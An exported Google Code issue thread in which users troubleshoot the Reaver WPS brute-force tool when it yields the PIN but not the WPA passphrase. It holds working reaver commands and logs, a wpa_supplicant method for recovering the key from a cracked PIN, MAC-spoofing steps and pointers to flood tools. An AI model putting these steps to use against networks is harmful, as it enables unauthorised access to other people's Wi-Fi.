Reaver finds PIN but not passphrase

[GoogleCodeExporter]

computer with backtrack and Reaver is in other room, so cant cut and paste 
outputs etc...  Reaver works just fine, except when it completes the attack it 
returns the PIN but NOT the passphrase.  anyone know why?

Original issue reported on code.google.com by Bel.Mard...@gmail.com on 30 Jan 2012 at 10:51

[GoogleCodeExporter]

I am having the same issue.

I use lates SVN code (r112) and this command
reaver -i wlan0 -b 00:B0:0C:55:9B:88  -vvv -c 7 -N --pin=56103762 -A
(using aireplay-ng to associate)

here is the capture
http://www.mediafire.com/?uxe795qpzu7zldt

when not using aireplay-ng the output is the same

on the other hand when I remove the -N switch, I am no longer able to crack it

I am always getting this output and not cracking it

Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 56103762

Original comment by jcdento...@gmail.com on 30 Jan 2012 at 7:36

[GoogleCodeExporter]

here is the capture when not using the -N switch (with or without aireplay-ng 
to associate)

http://www.mediafire.com/file/6xp7wghzy947pl1/WPA__.cap
http://www.mediafire.com/file/nc7dgvdp775wdvy/WPA____.cap

Any ideas what might be wrong?

usually it prints out time, ESSID, PIN, WPA-PSK

in this case only time and PIN
no WPA-PSK, no ESSID

Original comment by jcdento...@gmail.com on 30 Jan 2012 at 7:45

[GoogleCodeExporter]

Same issue where reaver-1.4 would find the WPS pin but not reveal the WPA 
password.  Ran reaver-1.4 several times with the -p argument and WPS pin but it 
never showed the WPA password.  Removed reaver-1.4 and ran reaver-1.3 and the 
password showed up first attempt.

Original comment by brian...@gmail.com on 12 Feb 2012 at 1:13

[GoogleCodeExporter]

unfortunately most of the APs I have here are sending multiple WPS packets at 
once so older revisions of reaver interpret that as out-of-orders messages

-N switch was first implemented in in revision 106/107 so I guess reaver v 1.3 
does not support that

any other ideas?

Original comment by jcdento...@gmail.com on 20 Feb 2012 at 7:01

[GoogleCodeExporter]

Yeah I am having the same issue as above. All nearby AP's return multiple 
packets.
Also, if let's say the "correct pin" is  12213456 (without returned wpa) and I 
run reaver .... -p 12215678 it yet once again says "correct pin" (even after 
reboot on Live CD)

Those sent multiple wps packets seem to be the problem I believe.

Also from what I've read you can CHANGE the WPA using the WPS pin with 
wpa_supplicant, but not sure if you can read the current password somehow 
through that WPS pin.

Hopefully Craig hasn't abandoned this little project.

Original comment by xFxIxC...@gmail.com on 29 Feb 2012 at 3:54

[GoogleCodeExporter]

Hopefully this helps out any future wanderers who recover a PIN w/reaver but no 
PSK, as I have had this happen a few times myself with different testing 
devices and firmwares.

I am not 100% certain why this occurs, but I have a feeling that there’s more 
than one reason behind it.  Regardless, it's important to know that you CAN 
authenticate to the AP with just the pin, and in many cases, you will be able 
to recover that sessions PSK, albeit a manual processes.

I use debian squeeze (6.0), with kernel 3.2.0-0 from backports, along with 
latest compat-wireless (3.3.1).  I have tested this with wpa_supplicant from 
the repos (v0.6.10), and not from source.

First, set yourself up a very basic wpa_supplicant.conf in 
/etc/wpa_supplicant.conf:
--
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
update_config=1
--
Second, start wpa_supplicant in daemon mode:
wpa_supplicant -Dwext -iwlan0 -c/etc/wpa_supplicant.conf –B

Third, run wpa_cli, and verify that it's working by issuing command 'status'.  
You should see wpa_state=INACTIVE

Fourth, lets add our BSSID and PIN:
wps_reg xx:xx:xx:xx:xx:xx 12345678

You should see an "OK".  Wait a few more seconds as wpa_supplicant picks up the 
BSSID and tries to associate and perform key negotiation.  What you want to see 
is "CTRL-EVENT-CONNECTED", which will indicate that the PIN was accepted and 
that you're now associated.

At this point, if you were to exit wpa_cli, you could run dhclient on wlan0 and 
would be offered an IP from the AP, assuming DHCPd were enabled.

Go ahead and type the command 'save', which should output another "OK".  This 
will update the wpa_supplicant.conf file, as specified from the command line, 
with a static configuration for this new network.

Verify by:  cat /etc/wpa_supplicant.conf

If all went well, you should have a line under this new network titled 'psk'.
Good luck!

Original comment by ryanjna...@gmail.com on 11 Apr 2012 at 2:26

[GoogleCodeExporter]

I came across this issue as well when first running reaver, I believe it is 
because i used the -N option but not too sure. After receiving the correct pin 
i then tried this command "reaver -i wlan0 -b 58:6D:8F:D3:8C:AA -vv -T 2 -p 
32410648" it took about an hour but it eventually spit out the psk.

Original comment by str8...@gmail.com on 19 Apr 2012 at 6:39

[GoogleCodeExporter]

solution mentioned above about wpa supplicant worked for me!!!!!!!reaver only 
gived to me pin but no psk , but launching wpa_supplicant as he mentioned it 
worked!!!! thanks i hope this can help more people with same problem

Original comment by totten.s...@gmail.com on 25 May 2012 at 10:53

[GoogleCodeExporter]

tried the solution, but still couldn't get the pin, what could have wrong.

ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
update_config=1

network={
    ssid="XXXX"
    bssid=XXXX
    psk="44122317"
    key_mgmt=WPA-PSK
    auth_alg=OPEN
}

Original comment by sammun...@gmail.com on 3 Jun 2012 at 2:48

[GoogleCodeExporter]

Ugh. Still after doing this it outputs int wpa_supplicant.conf a 64 hex number 
and a ssid which is totally random and not the network. Oh well.... not other 
solutions? Have tried everything (including running reaver with the -p setting 
like 100 times). 

Original comment by factoryu...@gmail.com on 17 Sep 2012 at 3:47

[GoogleCodeExporter]

Hello,

I am running backtrack 5 R3 with a alfa network AWUSO36H and when i run the 
command river -i mon0 -b XXXXXXXXXXXXXX -vv, the pin blocks first at 90.90 but 
i solved the problem and second at 99.99% but there is nothing i can do... can 
anyone help me plz ?

Thank's

Original comment by contulme...@gmail.com on 18 Sep 2012 at 12:28

[GoogleCodeExporter]

hi,

not clear for me how to run wpa_supplicant if i type the same commands as above 
dont suceed can anyone explain or recommend a page step by step thank you

Original comment by gergo.la...@gmail.com on 22 Oct 2012 at 2:35

[GoogleCodeExporter]

I also tried to do as written in Comment 6 with wpa_supplicant.conf and I get 
result same as Comment 10.

"Ugh. Still after doing this it outputs int wpa_supplicant.conf a 64 hex number 
and a ssid which is totally random and not the network. Oh well.... not other 
solutions? Have tried everything (including running reaver with the -p setting 
like 100 times)."

But, I was connected to the Internet and was able to get into the router page 
at 192.168.1.1 but the router password was different from admin, so how to get 
router password or change PSK without geting router password?

Original comment by vli...@gmail.com on 18 Nov 2012 at 8:27

[GoogleCodeExporter]

same here... :( im using ALfa 036H... what would be the problem? pls any one

Original comment by johnnn.g...@gmail.com on 25 Nov 2012 at 10:17

[GoogleCodeExporter]

comment 6 is great. thanks. i was able to retrieve the PSK. at first i'm having 
trouble associating with the AP, what i did was to change my Mac and 
re-associates it again to AP via aireplay-ng. It asssociates and connect, then 
dhclient do assign IP. I save it in /etc/wpa_supplicant.conf

nice walkthrough :P

Original comment by m0ve0npa...@gmail.com on 16 Dec 2012 at 9:24

[GoogleCodeExporter]

I have the same problem as comment 1,after 3 days i,m finally done but i only 
get the wps pin! my network card is zydas1211 i,m using backtrack 5 r3 i had to 
use the command   -N tryed the solution from comment 6 but i get this error 
failed to read or parse configuration '/etc/wpa_supplicant.conf' after this 
step wpa_supplicant -Dwext -iwlan0 -c/etc/wpa_supplicant.conf –B .

someone help plz thx

Original comment by sbadari...@googlemail.com on 26 Dec 2012 at 3:26

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

for who wants to try! 
I had the same issue but after using the 64digit with WPA2-Personal AES it 
works for me under win7.

Anyway the solution in comment n°6 works 100%

Original comment by csc...@gmail.com on 8 Jan 2013 at 10:00

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

RESOLVED for me 

just changing faked mac of mon0 to my original alfa 
(faked mac use to be the problem) ( Got a signal of 94% on the AP-much than 
needed...)
----------------------------------------------------------------------
whit faked mac on mon0 :

root@bt:~# reaver -i mon0 -b 10:BF:48:xx:xx:xx -N -p 98529742 -T 2.00 -vv

[+] Waiting for beacon from 10:BF:48:xx:xx:xx
[+] Switching mon0 to channel 6
[+] Associated with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[+] Trying pin 98529742
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 24 seconds
[+] WPS PIN: '98529742'
[+] Nothing done, nothing to save.
---------------------------------------------------------
whitout -N option :

root@bt:~# reaver -i mon0 -b 10:BF:48:xx:xx:xx -p 98529742 -T 2.00 -vv

[+] Waiting for beacon from 10:BF:48:xx:xx:xx
[+] Switching mon0 to channel 6
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[+] Associated with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[+] Trying pin 98529742
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 98529742
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 98529742
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[!] WARNING: Failed to associate with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
-----------------------------------------------------------------------

Without faking mac on mon0 (true alfa awuso36h)

root@bt:~# reaver -i mon0 -b 10:BF:48:xx:xx:xx -p 98529742 -T 2.00 -vv

[+] Waiting for beacon from 10:BF:48:xx:xx:xx
[+] Switching mon0 to channel 6
[+] Associated with 10:BF:48:xx:xx:xx (ESSID: saxxxos)
[+] Trying pin 98529742
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 98529742
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 11 seconds
[+] WPS PIN: '98529742'
[+] WPA PSK: '78907JGDE%6**IN*?%?GGHJL'
[+] AP SSID: 'saxxxos'

seem to be an authentification problem
(runing bt5 rc3 black hat + reaver updated to newest revision 

hope this help someone

Original comment by malfra...@gmail.com on 22 Jan 2013 at 7:47

[GoogleCodeExporter]

ok i ffinaly found a solution comment 6 i cant save every time i type save and 
hit enter i get FAIL i retrieved the pass using my android phone u have to 
connect via the pin using your android phone and after that u can retrieve itz 
using a wpa pass retrieve app

Original comment by sbadari...@googlemail.com on 24 Jan 2013 at 5:36

[GoogleCodeExporter]

hi, can someone help me with this:

im running backtrack 5 R2 on a live usb, i try to do the suggested solution in 
post no. 6 but im getting this error "failed to read or parse configuration 
'/etc/wpa_supplicant.conf' " after this step wpa_supplicant -Dwext -iwlan0 
-c/etc/wpa_supplicant.conf –B

please help me .. :(

Original comment by morelie_...@yahoo.com on 13 Feb 2013 at 2:49

[GoogleCodeExporter]

hi I am new to the linux system and I dont know how to run the WPA_suppliant 
stuff mentioned in #6. 
I have backtrack R3 and reaver 1.4, do I have install additional software to 
run the stuff mentioned in #6? or are they included in backtrack R3?
and also I always get the error "failed to read or parse configuration 
'/etc/wpa_supplicant.conf' like some other people here

help would be greatly appriciated. 

Original comment by temperat...@gmail.com on 21 Feb 2013 at 5:27

[GoogleCodeExporter]

  Hi all, thanks for all the useful info. I am running bt5r3 and able to successfully get a pin and wpa psk, but the psk is 64 chars long and changes everytime a run reaver with the p argument (to include pin). Any help would be appreciated!

Original comment by ludwi...@gmail.com on 28 Feb 2013 at 10:39

[GoogleCodeExporter]

#6 & #15 works to me

wpa_supplicant to wps registrar & aireplay to associate

Original comment by arrobapo...@gmail.com on 7 Mar 2013 at 5:12

[GoogleCodeExporter]

i used -Dnl80211 instead -Dwext.

Original comment by arrobapo...@gmail.com on 7 Mar 2013 at 5:17

[GoogleCodeExporter]

IF you get a WPS Code BUT no WPA, the problem appears to be in reaver 1.4. If 
you run reaver 1.3 and add the --pin=XXXXXXXX you got from reaver 1.4 you will 
crack the code. The Musket Team keeps a BT5R1 loaded with reaver 1.3 on a flash 
drive specifically for this purpose. We ran the following against an AP with 
reaver 1.3 and got the code in 28 seconds.

reaver -i mon0 -a -f -c 4 -b XX:XX:XX:XX:XX:XX -vv -x 60 -L --pin=XXXXXXXX 
--mac=00:11:22:33:44:55 #nameofAP

A note of caution IF you are going to spoof a mac with reaver. You need to run  
the following commands with your moniter prior to running reaver

airmon-ng stop mon0 #remove all moniters
ifconfig wlan0 down
ifconfig wlan0 hw ether 00:11:22:33:44:55
ifconfig wlan0 up
airmon-ng start wlan0
reaver -i mon0 -a -f -c 4 -b XX:XX:XX:XX:XX:XX -vv -x 60 -L --pin=XXXXXXXX 
--mac=00:11:22:33:44:55 #nameofAP

NOTE the mac following
 ifconfig wlan0 hw ether
must equal the mac in the reaver command string 

Original comment by muske...@yahoo.com on 27 Mar 2013 at 5:05

[GoogleCodeExporter]

adding the --mac=00:11:22:33:44:55 solved the issue for me.  Thanks to 
everyone.  Have patience and read lots of post the answer is usually out there. 
 I am learning sooooo much,

Original comment by dknei...@gmail.com on 29 Jun 2013 at 12:03

[GoogleCodeExporter]

I have another problem,
reaver cracked the code and the is sth like:
Pin cracked in 32695 seconds
[+] WPS PIN: '52294327'
[+] WPA PSK: 'be2b1e66f3bb26a225b6719703e2f30739cbb62f6c3fccd27834bdcad35c4290'
[+] AP SSID: 'ZyXEL'

but wpa psk is not usable, (AP doesnt accept it)

Original comment by ardeshir...@gmail.com on 4 Jul 2013 at 9:35

[GoogleCodeExporter]

I tried to use the solution with wpa_supplicant but i get connection error at 
the console of wps_cli. it gives me this:
Trying to associate with 08:76:ff:1a:7a:8c (SSID='Thomson1A7A8C' freq=2412 MHz) 
<3>Associated with 00:00:00:00:00:00
CTRL-EVENT-DISCONNECTED bssid=08:76:ff:1a:7a:8c reason=0
What sould i try??

Original comment by tzio...@gmail.com on 8 Jul 2013 at 6:10

[GoogleCodeExporter]

Solution 27 works great for me. Thanks a lot guys you were very helpfull to me

Original comment by trk...@gmail.com on 20 Nov 2013 at 9:04

[GoogleCodeExporter]

I am novice in reaver and linux
I have checked many articles in this forum
I did run bellow command but I don't have any results after wash 
wash -i mon0 -C

... just nothing 
In this case There are not crackable router with reaver.
right?
I use airodump-ng mon0 .. It is many APs

I checked the answer in forum

"it appears in wash but can't be cracked with this software.
This is because by default it's Push Button method (WPS-PBC) which reaver can't 
crack."

I included others already faced the error in reaver command
"[!] WARNING: Receive timeout occurred"
"[!] WPS transaction failed (code: 0x2), re-trying last pin"
I may think the same issue

Is there any software which can be used in this case?

Original comment by young...@gmail.com on 23 Dec 2013 at 12:05

[GoogleCodeExporter]

dear 32 young...@gmail.com , first you conform that there is wps enable or 
not.you can check it with wifite.you can download it from here 
http://code.google.com/p/wifite/downloads/list  then instal it and run consol 
and just type these commands
1>chmod +x wifite.py
2>python wifite.py
then you can see the AP has wps enable or not,then after you can use your tools.

dear friends, can anybody can tell how to find pin with password ?.there is no 
wps enable and i know the password which i had crack with dictonary attack.but 
the problem is i want the pin..
please 

Original comment by majo...@gmail.com on 20 Jan 2014 at 5:12

[GoogleCodeExporter]

a better solution is once you have the key (or instead of using reaver 
completely) use bully to get the key.

As they run side by side, so you can install both, and bully is an alternative 
to reaver that is still getting maintained.

worked for me in a flash, used the pin from reaver in bully.

Original comment by smelly...@gmail.com on 19 Feb 2014 at 4:04

[GoogleCodeExporter]

What worked in my case was I just ran reaver a few more times with the 
--pin=XXXXXX argument and it eventually spat out the PSK. Weird, but it did 
work.

Original comment by fardel...@gmail.com on 9 May 2014 at 2:05

[GoogleCodeExporter]

I concur on solution 27. Worked instantly.
Fast, easy solution for dumber people like me.
Couldn't get "wpa_supplicant" to work.
Thanks to muske...@yahoo.com. 
Short form works fine also: -p XXXXXXXX -m 00:11:22:33:44:55

Original comment by lpro...@ymail.com on 17 Jun 2014 at 12:17

[GoogleCodeExporter]

I also concur. Solution in Post #27 worked instantly to get the PSK as well. 
Had to jump through a few hoops to downgrade/install 1.3 on Kali Linux, albeit, 
very easy.
Thanks!

Original comment by gism...@gmail.com on 9 Jul 2014 at 4:36

[GoogleCodeExporter]

Hi

I cracked wpa with reaver, i know the 8 digits Pin, i use this command but no 
way

reaver -i mon0 -b XX:XX:XX:XX:XX:XX --essid=XXXXX --p=XXXXXXXX -a -vv

any Solution please ? 

http://sayyedat.com

Original comment by sayyedat...@gmail.com on 7 Aug 2014 at 6:06

[GoogleCodeExporter]

#7 worked for me "spat out the psk in 10 seconds

Original comment by ariffida...@gmail.com on 13 Aug 2014 at 1:15

[GoogleCodeExporter]

Tried wpa_supplicant with no luck.
Changed -Dwtext to -Dnl80211 which got rid of some errors but still no luck.  I 
feel like I was making some progress here by changing the -D command.  I also 
disabled the NetworkManager.  I think the issue is that the AP is sending so 
many M1 packets and it ends up getting packets out of order.  Throwing errors.  
This solution was very promising and am going to be playing around with it for 
a few days seeing what I can come up with. I never found anything in 
wpa_supplicant that is similar to the -N command in reaver. So I moved on.

I didn't get too concerned just continued on down this page for more solutions. 
 Got to the "bully" solution and I can't seem to get any authentication with 
bully.  Added a -A command hoping that would help but it didn't.  Bully also 
seems to not use the pin I issue with -p.  It jumbles up a couple of numbers 
which I find very strange.  Thinking it may be because of the leading 0 in my 
pin, but that is just a hunch. I also think my connection issues is, once again 
the out of order packets sent by the AP. I have made no progress getting bully 
to connect so far it proves to be my 3rd best option to solve this problem.

Finally I simply tried to downgrade reaver to 1.3.  After doing this I just 
constantly got an out of order packets error not letting me connect.  This 
seems to be the issue preventing me from getting the pass.  Are the AP's 
intentionally sending them this way for security purposes?

Any suggestions people, with these solutions or a new solution all together?  
Help please. 

I'm using Kali and reaver 1.4 with a TP-LINK usb TL-WN722N card.

Original comment by psychede...@gmail.com on 21 Aug 2014 at 1:45

[GoogleCodeExporter]

Forgot to state that I feel like what prevents you from getting the pass is the 
-N in reaver and without that command I just get errors.  Like what was stated 
in #20.

Original comment by psychede...@gmail.com on 21 Aug 2014 at 2:29

[GoogleCodeExporter]

 #40  psychede...@gmail.com
>Are the AP's intentionally sending them this way for security purposes?
In my case it's usually because the signal level is low, try getting closer to 
AP.

Original comment by rmps...@gmail.com on 21 Aug 2014 at 3:11

[GoogleCodeExporter]

I can get closer, but what kind of signal level do you look for?  Obviously you 
want the best possible but what range do you think should be... ok.

I tend to test anywhere from -40db to -80db.

Original comment by psychede...@gmail.com on 21 Aug 2014 at 3:28

[GoogleCodeExporter]

well, if -40 don't help, that's not it.

Original comment by rmps...@gmail.com on 21 Aug 2014 at 4:53

[GoogleCodeExporter]

This one isn't.  Started testing with weaker signals its typicall -70 to -80

Original comment by psychede...@gmail.com on 21 Aug 2014 at 5:34

[GoogleCodeExporter]

For all you guys having reacer issue and locked out APs get the script from 
revdk3r-1.sh
This has worked 100% for me testing 7 different routers provided you are close 
enough to AP

Original comment by denos.D...@gmail.com on 21 Aug 2014 at 7:29

[GoogleCodeExporter]

revdk3r?  Thats a new one for me.  Never heard of it.  Looks like you just run 
it at the same time you are running reaver.

This has corrected the "out of order" packets for you?  Which attack option 
works best, 1 - 2 - 3?

Any tips for using it.  

Original comment by psychede...@gmail.com on 21 Aug 2014 at 7:53

[GoogleCodeExporter]

Or, It looks like it may be an alternative to reaver. hmm....

Original comment by psychede...@gmail.com on 21 Aug 2014 at 7:57

[GoogleCodeExporter]

It uses reaver and mdk3 
Use flood attack option 3 after answering questions like which 
Wlan to use wlan0 wlan1 etc.
It asks if you want to spoof your mac
It uses reaver and mdk3 simultaneously. 
You wont regret using it

Original comment by denos.D...@gmail.com on 22 Aug 2014 at 2:57

[GoogleCodeExporter]

https://forums.kali.org/showthread.php?19498-MDK3-Secret-Destruction-Mode/page13

Original comment by denos.D...@gmail.com on 22 Aug 2014 at 3:39